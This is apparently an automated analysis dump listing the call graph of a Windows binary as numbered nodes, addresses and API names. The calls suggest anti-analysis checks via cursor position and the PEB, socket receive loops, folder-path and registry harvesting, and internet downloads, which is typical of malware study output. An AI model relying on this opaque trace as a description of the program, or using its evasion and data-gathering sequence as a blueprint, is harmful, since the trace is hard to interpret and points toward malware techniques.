41d1d0 35 API calls 87952->87954 87981 41d1d0 87953->87981 87954->87953 87957 41b3ff 87958 41b390 std::ios_base::_Ios_base_dtor 87960 4219d0 87959->87960 87961 4219f5 87959->87961 87960->87812 87962 402cf0 std::_Throw_Cpp_error 35 API calls 87961->87962 87963 421a03 87962->87963 87964 41ace0 35 API calls 87963->87964 87965 421a18 87964->87965 88044 4351fb RaiseException 87965->88044 87967 421a3e 87976 42e9ff 87973->87976 87979 42e82a 87973->87979 87975 4163b0 35 API calls std::_Throw_Cpp_error 87975->87979 87976->87952 87977 433672 std::_Facet_Register 35 API calls 87977->87979 87978 417af0 35 API calls 87978->87979 87979->87975 87979->87976 87979->87977 87979->87978 87980 402df0 std::_Throw_Cpp_error 35 API calls 87979->87980 87988 413d50 87979->87988 87980->87979 87982 41d24d 87981->87982 87986 41d1f8 std::ios_base::_Ios_base_dtor 87981->87986 87982->87958 87983 41d1d0 35 API calls 87983->87986 87985 402df0 std::_Throw_Cpp_error 35 API calls 87985->87986 87986->87982 87986->87983 87986->87985 88027 417af0 87986->88027 87987->87957 87989 413d8f 87988->87989 88012 413df7 __Strxfrm 87988->88012 87990 413d96 87989->87990 87991 413e69 87989->87991 87992 413f7d 87989->87992 87989->88012 87994 433672 std::_Facet_Register 35 API calls 87990->87994 87993 433672 std::_Facet_Register 35 API calls 87991->87993 87995 433672 std::_Facet_Register 35 API calls 87992->87995 88003 413e73 87993->88003 87997 413da0 87994->87997 87996 413f8a 87995->87996 87996->88012 88003->88012 88012->87979 88012->88012 88044->87967 88045 45db00 GetCursorPos 88046 45db15 GetCursorPos 88045->88046 88047 45dbe8 GetPEB 88046->88047 88049 45db27 88046->88049 88047->88049 88048 45db33 GetPEB 88048->88049 88049->88047 88049->88048 88050 45dc5d Sleep 88049->88050 88051 45dba8 Sleep GetCursorPos 88049->88051 88052 45dc87 88049->88052 88050->88046 88051->88047 88051->88049 88053 44a402 88054 44a1e9 __fread_nolock 33 API calls 88053->88054 88056 44a40f 88054->88056 88055 44a41b 88056->88055 88060 44a467 88056->88060 88076 44a5ca 35 API calls __wsopen_s 88056->88076 88058 44a4c9 88065 44a4f8 88058->88065 88060->88055 88060->88058 88061 44c86c 33 API calls 88060->88061 88062 44a4bc 88061->88062 88062->88058 88077 44d685 5 API calls 2 library calls 88062->88077 88066 44a1e9 __fread_nolock 33 API calls 88065->88066 88067 44a507 88066->88067 88068 44a5ad 88067->88068 88069 44a51a 88067->88069 88070 449678 __wsopen_s 53 API calls 88068->88070 88071 44a537 88069->88071 88074 44a55e 88069->88074 88073 44a4da 88070->88073 88072 449678 __wsopen_s 53 API calls 88071->88072 88072->88073 88074->88073 88078 44259f 88074->88078 88076->88060 88077->88058 88079 4425b3 ___std_exception_copy 88078->88079 88084 4423f7 88079->88084 88082 43899c ___std_exception_copy 33 API calls 88083 4425d7 88082->88083 88083->88073 88086 442403 __FrameHandler3::FrameUnwindToState 88084->88086 88085 44240b 88085->88082 88086->88085 88087 442446 88086->88087 88089 44248c 88086->88089 88096 438be3 33 API calls 2 library calls 88087->88096 88095 44e6c4 EnterCriticalSection 88089->88095 88091 442492 88092 4424b3 88091->88092 88093 44251c __fread_nolock 35 API calls 88091->88093 88097 442514 LeaveCriticalSection __wsopen_s 88092->88097 88093->88092 88095->88091 88096->88085 88097->88085 88098 45a102 88099 45a155 88098->88099 88100 402cf0 std::_Throw_Cpp_error 35 API calls 88099->88100 88101 45a15d 88100->88101 88102 4163b0 std::_Throw_Cpp_error 35 API calls 88101->88102 88103 45a173 88102->88103 88104 4e64d0 35 API calls 88103->88104 88106 45a186 88104->88106 88105 45a1cd 88107 45a1dc CreateThread FindCloseChangeNotification 88105->88107 88106->88105 88108 416290 35 API calls 88106->88108 88110 45a2bd 88107->88110 88115 45a205 88107->88115 88849 4c7b00 88107->88849 88111 45a1b5 88108->88111 88109 45a210 GetPEB 88109->88115 88112 402cf0 std::_Throw_Cpp_error 35 API calls 88110->88112 88113 416290 35 API calls 88111->88113 88114 45a314 GetTempPathA 88112->88114 88113->88105 88196 4e63a0 88114->88196 88115->88109 88118 45a293 Sleep 88115->88118 88118->88109 88118->88110 88119 45a350 88120 402cf0 std::_Throw_Cpp_error 35 API calls 88119->88120 88121 45a3ab 88120->88121 88122 41ace0 35 API calls 88121->88122 88411 416300 35 API calls 2 library calls 88196->88411 88198 4e63da 88198->88119 88411->88198 88850 4c7ecc 88849->88850 88867 4c7b3e std::ios_base::_Ios_base_dtor __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 88849->88867 88851 4c7b87 setsockopt recv WSAGetLastError 88851->88850 88851->88867 88852 4c8590 8 API calls 88852->88867 88853 4c7e15 recv 88856 4c7eaf Sleep 88853->88856 88854 433069 __Xtime_get_ticks 2 API calls 88854->88867 88855 4c7eb7 Sleep 88855->88850 88855->88867 88856->88855 88857 418dc0 35 API calls 88858 4c7c2d recv 88857->88858 88859 4c7c4e recv 88858->88859 88858->88867 88859->88867 88860 4c7ee1 88863 438c70 std::_Throw_Cpp_error 33 API calls 88860->88863 88861 409280 38 API calls 88861->88867 88862 4163b0 std::_Throw_Cpp_error 35 API calls 88862->88867 88866 4c7ee6 88863->88866 88864 4c7cd6 setsockopt recv 88864->88867 88865 418dc0 35 API calls 88865->88864 88867->88851 88867->88852 88867->88853 88867->88854 88867->88855 88867->88856 88867->88857 88867->88860 88867->88861 88867->88862 88867->88864 88867->88865 88868 4c7ef0 86 API calls 88867->88868 88868->88867 88869 478b40 88889 478b85 88869->88889 88870 47a2e3 89571 490600 88870->89571 88872 47a2f5 89631 41af80 88872->89631 88881 4c1f20 177 API calls 88881->88889 88882 402cf0 35 API calls std::_Throw_Cpp_error 88882->88889 88885 4138b0 35 API calls 88885->88889 88887 4b3600 177 API calls 88887->88889 88889->88870 88889->88881 88889->88882 88889->88885 88889->88887 88890 417af0 35 API calls 88889->88890 88892 41af80 35 API calls 88889->88892 88893 413d50 35 API calls 88889->88893 88894 4163b0 35 API calls std::_Throw_Cpp_error 88889->88894 88898 4122c0 35 API calls 88889->88898 88899 4c00a0 88889->88899 88992 4be3c0 88889->88992 89085 4b84d0 88889->89085 89306 4b1630 88889->89306 89400 4adb20 88889->89400 89628 4a6250 152 API calls 5 library calls 88889->89628 89629 422870 35 API calls 4 library calls 88889->89629 89630 412cd0 35 API calls 2 library calls 88889->89630 88890->88889 88892->88889 88893->88889 88894->88889 88898->88889 88900 4c00fa 88899->88900 89647 4140c0 88900->89647 88903 41af80 35 API calls 88904 4c01c2 __fread_nolock 88903->88904 88905 4c01e0 SHGetFolderPathA 88904->88905 88906 41ac50 35 API calls 88905->88906 88907 4c021a 88906->88907 88908 4c0575 88907->88908 88909 4c0247 88907->88909 89753 4152b0 35 API calls 88908->89753 88910 4163b0 std::_Throw_Cpp_error 35 API calls 88909->88910 88912 4c025b 88910->88912 88914 4c6000 39 API calls 88912->88914 88913 4c05c1 88918 4c0570 88913->88918 89754 402fe0 33 API calls 2 library calls 88913->89754 88915 4c0272 88914->88915 88917 4c0294 88915->88917 88941 4c02ab 88915->88941 88925 4c0650 88918->88925 88948 4c0688 std::ios_base::_Ios_base_dtor __Strxfrm 88918->88948 89755 4242a0 35 API calls 88918->89755 88925->88948 89756 402fe0 33 API calls 2 library calls 88925->89756 88960 41ab20 35 API calls 88948->88960 88964 41e8a0 35 API calls 88948->88964 88966 41e710 35 API calls 88948->88966 88960->88948 88964->88948 88966->88948 88993 4be41a 88992->88993 88994 4140c0 35 API calls 88993->88994 88995 4be444 88994->88995 88996 41af80 35 API calls 88995->88996 88997 4be586 __fread_nolock 88996->88997 88998 4be5a4 SHGetFolderPathA 88997->88998 88999 41ac50 35 API calls 88998->88999 89000 4be5de 88999->89000 89001 4be60b 89000->89001 89002 4be945 89000->89002 89003 4163b0 std::_Throw_Cpp_error 35 API calls 89001->89003 90338 4152b0 35 API calls 89002->90338 89006 4be61f 89003->89006 89005 4be991 89013 4be940 89005->89013 90339 402fe0 33 API calls 2 library calls 89005->90339 89007 4c6000 39 API calls 89006->89007 89009 4be636 89007->89009 89010 4be658 89009->89010 89048 4be66f 89009->89048 89014 4185d0 35 API calls 89010->89014 89011 4be66a 89017 4185d0 35 API calls 89011->89017 89012 4be92b 89016 4185d0 35 API calls 89012->89016 89018 4bea1c 89013->89018 89084 4bea41 std::ios_base::_Ios_base_dtor __Strxfrm 89013->89084 90340 4242a0 35 API calls 89013->90340 89014->89011 89016->89013 89019 4bff0c 89017->89019 89020 402df0 std::_Throw_Cpp_error 35 API calls 89018->89020 89020->89084 89022 41e8a0 35 API calls 89022->89048 89026 4bffdc 89030 402cf0 std::_Throw_Cpp_error 35 API calls 89026->89030 89027 41ad80 35 API calls 89027->89048 89033 4bfff4 89030->89033 89031 4c6000 39 API calls 89031->89048 89032 4140c0 35 API calls 89032->89084 89035 41ace0 35 API calls 89033->89035 89034 4032d0 35 API calls std::_Throw_Cpp_error 89034->89084 89036 402df0 std::_Throw_Cpp_error 35 API calls 89036->89048 89038 4bff88 89042 402cf0 std::_Throw_Cpp_error 35 API calls 89038->89042 89039 4185d0 35 API calls 89039->89048 89040 4180a0 35 API calls 89040->89084 89043 4bff9f 89042->89043 89045 41ace0 35 API calls 89043->89045 89046 4c0038 89047 438c70 std::_Throw_Cpp_error 33 API calls 89046->89047 89051 4c003d 89047->89051 89048->89012 89048->89022 89048->89026 89048->89027 89048->89031 89048->89036 89048->89039 89049 4163b0 std::_Throw_Cpp_error 35 API calls 89048->89049 90337 424400 35 API calls std::_Throw_Cpp_error 89048->90337 89049->89048 89054 402cf0 std::_Throw_Cpp_error 35 API calls 89051->89054 89052 402fe0 33 API calls std::_Throw_Cpp_error 89052->89084 89053 41ab20 35 API calls 89053->89084 89055 4c0054 89054->89055 89057 41ace0 35 API calls 89055->89057 89056 41e8a0 35 API calls 89056->89084 89059 41e710 35 API calls 89059->89084 89060 41ad80 35 API calls 89060->89084 89063 4d6790 108 API calls 89063->89084 89064 510f30 20 API calls 89064->89084 89065 4bff4e 89068 402cf0 std::_Throw_Cpp_error 35 API calls 89065->89068 89066 54b610 20 API calls 89066->89084 89067 4d65f0 57 API calls 89067->89084 89069 4bff61 89068->89069 89072 41ace0 35 API calls 89069->89072 89071 54ae20 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 89071->89084 89073 426db0 35 API calls 89073->89084 89074 4bfe0b 89075 402cf0 std::_Throw_Cpp_error 35 API calls 89074->89075 89076 4bfe1f 89075->89076 89078 433672 35 API calls std::_Facet_Register 89078->89084 89079 403040 35 API calls std::_Throw_Cpp_error 89079->89084 89080 413d50 35 API calls 89080->89084 89081 424900 35 API calls 89081->89084 89082 402df0 35 API calls std::_Throw_Cpp_error 89082->89084 89083 417af0 35 API calls 89083->89084 89084->89011 89084->89026 89084->89032 89084->89034 89084->89038 89084->89040 89084->89046 89084->89051 89084->89052 89084->89053 89084->89056 89084->89059 89084->89060 89084->89063 89084->89064 89084->89065 89084->89066 89084->89067 89084->89071 89084->89073 89084->89074 89084->89078 89084->89079 89084->89080 89084->89081 89084->89082 89084->89083 90341 41c3a0 35 API calls std::_Facet_Register 89084->90341 90342 54af50 13 API calls 89084->90342 89086 4b8506 __wsopen_s 89085->89086 89087 4140c0 35 API calls 89086->89087 89088 4b855e 89087->89088 89089 41af80 35 API calls 89088->89089 89090 4b85fc __fread_nolock 89089->89090 89091 4b861a SHGetFolderPathA 89090->89091 89092 41ac50 35 API calls 89091->89092 89093 4b8654 89092->89093 89094 4b89db 89093->89094 89095 4b8681 89093->89095 89096 403040 std::_Throw_Cpp_error 35 API calls 89094->89096 89097 4163b0 std::_Throw_Cpp_error 35 API calls 89095->89097 89098 4b8a0b 89096->89098 89099 4b8695 89097->89099 90374 4152b0 35 API calls 89098->90374 89101 4c6000 39 API calls 89099->89101 89103 4b86ac 89101->89103 89102 4b8a1e 89105 402df0 std::_Throw_Cpp_error 35 API calls 89102->89105 89104 4b86ce 89103->89104 89167 4b86e5 89103->89167 89106 4185d0 35 API calls 89104->89106 89108 4b89d9 89105->89108 89109 4b86e0 89106->89109 89107 4b89c4 89111 4185d0 35 API calls 89107->89111 89110 4b8a94 89108->89110 89113 403040 std::_Throw_Cpp_error 35 API calls 89108->89113 89115 4185d0 35 API calls 89109->89115 89112 41ab20 35 API calls 89110->89112 89111->89108 89116 4b8a5c 89113->89116 89121 41e8a0 35 API calls 89121->89167 89129 41ad80 35 API calls 89129->89167 89130 4bdfaa 89133 402cf0 std::_Throw_Cpp_error 35 API calls 89130->89133 89137 4bdfc2 89133->89137 89136 4c6000 39 API calls 89136->89167 89144 402df0 std::_Throw_Cpp_error 35 API calls 89144->89167 89152 4185d0 35 API calls 89152->89167 89165 4163b0 std::_Throw_Cpp_error 35 API calls 89165->89167 89167->89107 89167->89121 89167->89129 89167->89130 89167->89136 89167->89144 89167->89152 89167->89165 90373 424400 35 API calls std::_Throw_Cpp_error 89167->90373 89307 4b168a 89306->89307 89308 4140c0 35 API calls 89307->89308 89309 4b16b4 89308->89309 89310 41af80 35 API calls 89309->89310 89311 4b1761 __fread_nolock 89310->89311 89312 4b177f SHGetFolderPathA 89311->89312 89313 41ac50 35 API calls 89312->89313 89314 4b17b9 89313->89314 89315 4b17e6 89314->89315 89316 4b1b25 89314->89316 89317 4163b0 std::_Throw_Cpp_error 35 API calls 89315->89317 90636 4152b0 35 API calls 89316->90636 89319 4b17fa 89317->89319 89321 4c6000 39 API calls 89319->89321 89320 4b1b71 89329 4b1b20 89320->89329 90637 402fe0 33 API calls 2 library calls 89320->90637 89322 4b1811 89321->89322 89324 4b1833 89322->89324 89361 4b184a 89322->89361 89325 4185d0 35 API calls 89324->89325 89327 4b1845 89325->89327 89326 4b1b0b 89331 4185d0 35 API calls 89326->89331 89332 4185d0 35 API calls 89327->89332 89328 4b1bf9 89384 4b1c64 std::ios_base::_Ios_base_dtor __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Strxfrm 89328->89384 90639 402fe0 33 API calls 2 library calls 89328->90639 89329->89328 89329->89384 90638 4242a0 35 API calls 89329->90638 89331->89329 89334 4b3469 89332->89334 89337 41e8a0 35 API calls 89337->89361 89340 4b3539 89343 402cf0 std::_Throw_Cpp_error 35 API calls 89340->89343 89341 41ad80 35 API calls 89341->89361 89347 4b3551 89343->89347 89344 4c6000 39 API calls 89344->89361 89346 4140c0 35 API calls 89346->89384 89348 41ace0 35 API calls 89347->89348 89349 402df0 std::_Throw_Cpp_error 35 API calls 89349->89361 89351 4b34e5 89354 402cf0 std::_Throw_Cpp_error 35 API calls 89351->89354 89352 4180a0 35 API calls 89352->89384 89353 4185d0 35 API calls 89353->89361 89355 4b34fc 89354->89355 89356 41ace0 35 API calls 89355->89356 89359 4b3595 89362 438c70 std::_Throw_Cpp_error 33 API calls 89359->89362 89360 402df0 35 API calls std::_Throw_Cpp_error 89360->89384 89361->89326 89361->89337 89361->89340 89361->89341 89361->89344 89361->89349 89361->89353 89364 4163b0 std::_Throw_Cpp_error 35 API calls 89361->89364 90635 424400 35 API calls std::_Throw_Cpp_error 89361->90635 89366 4b359a 89362->89366 89364->89361 89368 402cf0 std::_Throw_Cpp_error 35 API calls 89366->89368 89367 41ab20 35 API calls 89367->89384 89369 4b35b1 89368->89369 89371 41ace0 35 API calls 89369->89371 89370 41e8a0 35 API calls 89370->89384 89372 41e710 35 API calls 89372->89384 89374 41ad80 35 API calls 89374->89384 89377 4d6790 108 API calls 89377->89384 89378 510f30 20 API calls 89378->89384 89379 4b34ab 89381 402cf0 std::_Throw_Cpp_error 35 API calls 89379->89381 89380 4d65f0 57 API calls 89380->89384 89382 4b34be 89381->89382 89385 41ace0 35 API calls 89382->89385 89384->89327 89384->89340 89384->89346 89384->89351 89384->89352 89384->89359 89384->89360 89384->89366 89384->89367 89384->89370 89384->89372 89384->89374 89384->89377 89384->89378 89384->89379 89384->89380 89386 54ae20 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 89384->89386 89387 433672 std::_Facet_Register 35 API calls 89384->89387 89388 4b334f 89384->89388 89391 417af0 35 API calls 89384->89391 89393 403040 35 API calls std::_Throw_Cpp_error 89384->89393 89394 426db0 35 API calls 89384->89394 89396 4032d0 35 API calls std::_Throw_Cpp_error 89384->89396 89397 413d50 35 API calls 89384->89397 89398 424900 35 API calls 89384->89398 89399 54b610 20 API calls 89384->89399 90640 41c3a0 35 API calls std::_Facet_Register 89384->90640 90641 402fe0 33 API calls 2 library calls 89384->90641 90642 4412f6 89384->90642 90646 54af50 13 API calls 89384->90646 89386->89384 89387->89384 89389 402cf0 std::_Throw_Cpp_error 35 API calls 89388->89389 89390 4b3363 89389->89390 89392 41ace0 35 API calls 89390->89392 89391->89384 89393->89384 89394->89384 89396->89384 89397->89384 89398->89384 89399->89384 89401 4adb7a 89400->89401 89402 4140c0 35 API calls 89401->89402 89403 4adba4 89402->89403 89404 41af80 35 API calls 89403->89404 89405 4adc42 __fread_nolock 89404->89405 89406 4adc60 SHGetFolderPathA 89405->89406 89407 41ac50 35 API calls 89406->89407 89408 4adc9a 89407->89408 89409 4adcc7 89408->89409 89410 4ae135 89408->89410 89412 4163b0 std::_Throw_Cpp_error 35 API calls 89409->89412 90650 4152b0 35 API calls 89410->90650 89413 4adcdb 89412->89413 89416 4c6000 39 API calls 89413->89416 89414 4ae181 89415 402df0 std::_Throw_Cpp_error 35 API calls 89414->89415 89418 4ae133 89415->89418 89417 4adcf2 89416->89417 89420 4add14 89417->89420 89493 4add2b 89417->89493 89419 4ae213 89418->89419 89429 4ae1db 89418->89429 90651 4242a0 35 API calls 89418->90651 89421 41ab20 35 API calls 89419->89421 89422 4185d0 35 API calls 89420->89422 89425 4ae2cf 89421->89425 89426 4add26 89422->89426 89423 4ae11e 89424 4185d0 35 API calls 89423->89424 89424->89418 89428 41ad80 35 API calls 89425->89428 89430 4185d0 35 API calls 89426->89430 89429->89419 90652 402fe0 33 API calls 2 library calls 89429->90652 89439 41e8a0 35 API calls 89439->89493 89447 4b15cf 89452 402cf0 std::_Throw_Cpp_error 35 API calls 89447->89452 89449 418f00 std::_Throw_Cpp_error 35 API calls 89449->89493 89456 4b15e8 89452->89456 89462 41abb0 35 API calls 89462->89493 89467 4c6000 39 API calls 89467->89493 89470 402df0 35 API calls std::_Throw_Cpp_error 89470->89493 89484 4185d0 35 API calls 89484->89493 89491 4163b0 std::_Throw_Cpp_error 35 API calls 89491->89493 89493->89423 89493->89439 89493->89447 89493->89449 89493->89462 89493->89467 89493->89470 89493->89484 89493->89491 90649 424400 35 API calls std::_Throw_Cpp_error 89493->90649 89572 490636 __wsopen_s 89571->89572 89573 4140c0 35 API calls 89572->89573 89574 490694 89573->89574 89575 41af80 35 API calls 89574->89575 89581 490741 __Strxfrm 89575->89581 89576 490809 RegOpenKeyExA 89577 490845 __fread_nolock 89576->89577 89576->89581 89582 49085c RegEnumKeyA 89577->89582 89578 492328 89583 402cf0 std::_Throw_Cpp_error 35 API calls 89578->89583 89579 4032d0 std::_Throw_Cpp_error 35 API calls 89579->89581 89580 402df0 std::_Throw_Cpp_error 35 API calls 89580->89581 89581->89576 89581->89578 89581->89579 89581->89580 89584 49230f 89581->89584 89585 490880 RegOpenKeyExA 89582->89585 89586 4922e2 RegCloseKey 89582->89586 89587 492341 89583->89587 89584->88872 89604 49089f std::ios_base::_Ios_base_dtor __fread_nolock __Strxfrm 89585->89604 89586->89581 89588 41ace0 35 API calls 89587->89588 89589 492356 89588->89589 90678 4351fb RaiseException 89589->90678 89590 4922ba RegEnumKeyA 89590->89585 89590->89586 89592 492382 89593 438c70 std::_Throw_Cpp_error 33 API calls 89592->89593 89594 492387 89593->89594 89596 402cf0 std::_Throw_Cpp_error 35 API calls 89594->89596 89595 49092b RegQueryValueExA 89597 492298 RegCloseKey 89595->89597 89595->89604 89598 49239a 89596->89598 89597->89604 89599 41ace0 35 API calls 89598->89599 89600 4923af 89599->89600 90679 4351fb RaiseException 89600->90679 89601 403040 35 API calls std::_Throw_Cpp_error 89601->89604 89603 4923db 89606 402cf0 std::_Throw_Cpp_error 35 API calls 89603->89606 89604->89578 89604->89590 89604->89592 89604->89594 89604->89595 89604->89597 89604->89601 89604->89603 89605 490bc3 RegQueryValueExA 89604->89605 89609 490dfe RegQueryValueExA 89604->89609 89616 416130 35 API calls 89604->89616 89619 416130 35 API calls 89604->89619 89620 4c6b00 38 API calls 89604->89620 89621 433672 35 API calls std::_Facet_Register 89604->89621 89622 4163b0 35 API calls std::_Throw_Cpp_error 89604->89622 89623 417af0 35 API calls 89604->89623 89624 426db0 35 API calls 89604->89624 89625 413d50 35 API calls 89604->89625 89627 402fe0 33 API calls std::_Throw_Cpp_error 89604->89627 90676 4322ad GetLastError 89604->90676 90677 424900 35 API calls 89604->90677 89605->89604 89607 490cbd RegQueryValueExA 89605->89607 89608 4923ef 89606->89608 89607->89604 89607->89609 89610 41ace0 35 API calls 89608->89610 89609->89604 89611 490eeb RegQueryValueExA 89609->89611 89612 492404 89610->89612 89611->89604 89613 490fd5 RegQueryValueExA 89611->89613 90680 4351fb RaiseException 89612->90680 89613->89604 89614 4910bf RegQueryValueExA 89613->89614 89614->89604 89616->89609 89619->89604 89620->89604 89621->89604 89622->89604 89623->89604 89624->89604 89625->89604 89627->89604 89628->88889 89629->88889 89630->88889 89632 41afb8 89631->89632 89633 41afda 89632->89633 89634 41b08c 89632->89634 89636 403040 std::_Throw_Cpp_error 35 API calls 89633->89636 89635 402cf0 std::_Throw_Cpp_error 35 API calls 89634->89635 89637 41b09c 89635->89637 89638 41b013 89636->89638 89639 41ace0 35 API calls 89637->89639 90681 426db0 89638->90681 89641 41b0b1 89639->89641 90685 4351fb RaiseException 89641->90685 89648 4140ff 89647->89648 89649 433672 std::_Facet_Register 35 API calls 89648->89649 89651 41412e 89649->89651 89650 4141ac 89650->88903 89651->89650 89761 419860 35 API calls 89651->89761 89753->88913 89754->88918 89755->88925 89756->88948 89761->89651 90337->89048 90338->89005 90339->89013 90340->89018 90341->89084 90342->89084 90373->89167 90374->89102 90635->89361 90636->89320 90637->89329 90638->89328 90639->89384 90640->89384 90641->89384 90643 44130a ___std_exception_copy 90642->90643 90644 43899c ___std_exception_copy 33 API calls 90643->90644 90645 441333 90644->90645 90645->89384 90646->89384 90649->89493 90650->89414 90651->89429 90652->89419 90676->89604 90678->89592 90679->89603 90683 426df1 90681->90683 90682 433672 std::_Facet_Register 35 API calls 90684 426e23 90682->90684 90683->90682 90683->90684 90686 4eea40 90687 4eea5f 90686->90687 90688 4eea6f 90686->90688 90687->90688 90689 4eea64 CharNextA 90687->90689 90691 4eea84 CharNextA 90688->90691 90692 4eea92 90688->90692 90689->90687 90689->90688 90690 4eeaaf 90691->90688 90691->90692 90692->90690 90693 4eeaa4 CharNextA 90692->90693 90694 4eeabe __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 90692->90694 90693->90690 90693->90692 90695 4eeb4f lstrlenA 90694->90695 90696 4eeb5c 90694->90696 90697 4eeb5f GetProcessHeap HeapAlloc lstrcpynA 90695->90697 90696->90697 90700 4edc80 90697->90700 90699 4eeba1 GetProcessHeap HeapFree 90718 4eded0 InternetOpenA 90700->90718 90702 4edcf0 90703 4edd08 90702->90703 90704 4edd3d 90702->90704 90705 4edd45 InternetReadFile 90702->90705 90703->90699 90706 4ede8d InternetCloseHandle 90704->90706 90707 4eddca 90705->90707 90709 4edd61 90705->90709 90706->90703 90710 439820 35 API calls 90707->90710 90708 4eddac InternetReadFile 90708->90707 90708->90709 90709->90707 90709->90708 90730 429e20 90709->90730 90711 4ede60 90710->90711 90713 4ede84 InternetCloseHandle 90711->90713 90714 441628 56 API calls 90711->90714 90713->90706 90715 4ede7b 90714->90715 90716 43d0a8 58 API calls 90715->90716 90717 4ede81 90716->90717 90717->90713 90719 4edf0b 90718->90719 90720 4edf17 InternetSetOptionA 90718->90720 90719->90702 90721 4edf3b 90720->90721 90722 4ee05c HttpQueryInfoA 90721->90722 90727 4ee00d GetLastError 90721->90727 90723 4ee08a 90722->90723 90724 4ee083 InternetCloseHandle 90722->90724 90725 4ee098 InternetCloseHandle 90723->90725 90726 4ee091 InternetCloseHandle 90723->90726 90724->90723 90725->90702 90726->90725 90727->90722 90728 4ee021 90727->90728 90728->90722 90729 4ee02b InternetQueryOptionA InternetSetOptionA 90728->90729 90729->90722 90731 429e62 90730->90731 90732 429f76 90730->90732 90733 429e7c 90731->90733 90734 429eca 90731->90734 90735 429eba 90731->90735 90746 402b50 35 API calls 2 library calls 90732->90746 90736 433672 std::_Facet_Register 35 API calls 90733->90736 90739 433672 std::_Facet_Register 35 API calls 90734->90739 90743 429e9a __Strxfrm 90734->90743 90735->90732 90735->90733 90738 429e8f 90736->90738 90740 429f80 90738->90740 90738->90743 90739->90743 90741 438c70 std::_Throw_Cpp_error 33 API calls 90740->90741 90742 429f85 90741->90742 90744 4277d0 33 API calls 90743->90744 90745 429f47 90744->90745 90745->90709 90746->90740 90747 40a291 90748 40a2a2 FreeLibrary 90747->90748 90749 40a2a9 90747->90749 90748->90749 90750 52a240 90751 52a25c 90750->90751 90754 52a282 90750->90754 90752 52a278 90751->90752 90756 52a2a6 90751->90756 90768 509f40 90752->90768 90755 52a170 53 API calls 90755->90756 90756->90754 90756->90755 90758 52a4ea 90756->90758 90761 52a530 53 API calls 90756->90761 90762 52a4cb 90756->90762 90765 52a504 90756->90765 90776 52b760 90756->90776 90783 547510 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90758->90783 90760 52a4f5 90761->90756 90762->90754 90782 52a6b0 53 API calls 90762->90782 90764 52a4dc 90784 547510 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90765->90784 90767 52a50f 90769 509f54 90768->90769 90770 509fbf 90768->90770 90769->90770 90771 52b760 53 API calls 90769->90771 90770->90754 90772 509f79 90771->90772 90772->90770 90785 52a140 53 API calls 90772->90785 90774 509f91 90774->90770 90775 52b760 53 API calls 90774->90775 90775->90770 90777 52b777 90776->90777 90779 52b88d 90776->90779 90778 52ba20 53 API calls 90777->90778 90777->90779 90780 52b760 53 API calls 90777->90780 90786 50a2b0 90777->90786 90778->90777 90779->90756 90780->90777 90782->90764 90783->90760 90784->90767 90785->90774 90789 50a2d6 __fread_nolock 90786->90789 90792 50a4f3 90786->90792 90787 50a453 90787->90792 90821 510590 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90787->90821 90789->90787 90790 52b760 53 API calls 90789->90790 90789->90792 90793 54a0f0 3 API calls 90789->90793 90795 547510 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90789->90795 90800 548370 3 API calls 90789->90800 90801 50a5b0 90789->90801 90813 511b90 90789->90813 90819 50ec50 5 API calls 2 library calls 90789->90819 90820 50ac70 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90789->90820 90790->90789 90792->90777 90793->90789 90795->90789 90796 50ac22 90798 50ac49 90796->90798 90824 547510 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90796->90824 90798->90777 90800->90789 90801->90792 90805 52b760 53 API calls 90801->90805 90802 547510 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90812 50a46b __fread_nolock __Strxfrm 90802->90812 90803 50ac10 90823 527810 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90803->90823 90806 50a5e2 90805->90806 90806->90777 90808 549d90 RtlFreeHeap GetLastError 90808->90812 90809 54a0f0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection 90809->90812 90810 528ff0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90810->90812 90811 548370 3 API calls 90811->90812 90812->90792 90812->90796 90812->90802 90812->90803 90812->90808 90812->90809 90812->90810 90812->90811 90822 529730 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection __fread_nolock __Strxfrm 90812->90822 90814 511bc0 90813->90814 90815 511bfe 90814->90815 90817 511c19 90814->90817 90825 511c30 90814->90825 90815->90789 90818 520f90 5 API calls 90817->90818 90818->90815 90819->90789 90820->90789 90821->90812 90822->90812 90823->90796 90824->90798 90848 511ff0 90825->90848 90827 511c87 90828 511cc6 90827->90828 90829 511d11 90827->90829 90830 53cde0 17 API calls 90827->90830 90828->90814 90833 511e47 90829->90833 90836 511eed 90829->90836 90831 511cdc 90830->90831 90831->90829 90832 511ce2 90831->90832 90930 5496d0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90832->90930 90931 5496d0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90833->90931 90837 548370 3 API calls 90836->90837 90838 511f15 90837->90838 90870 514550 90838->90870 90839 511e55 90839->90828 90840 511fbd 90839->90840 90932 53ea90 10 API calls 90839->90932 90840->90828 90933 53ccf0 10 API calls 90840->90933 90849 512019 90848->90849 90850 512068 90848->90850 90855 512048 90849->90855 90934 5496d0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap GetLastError 90849->90934 90851 512163 90850->90851 90854 5120b8 90850->90854 90858 512079 90850->90858 90866 5121da 90850->90866 90851->90858 90861 5121a9 90851->90861 90853 51218c 90853->90827 90856 4412b7 36 API calls 90854->90856 90855->90827 90857 5120c3 90856->90857 90860 514550 53 API calls 90857->90860 90858->90853 90936 5496d0 RtlAllocateHeap EnterCriticalSection LeaveCriticalSection RtlFreeHeap 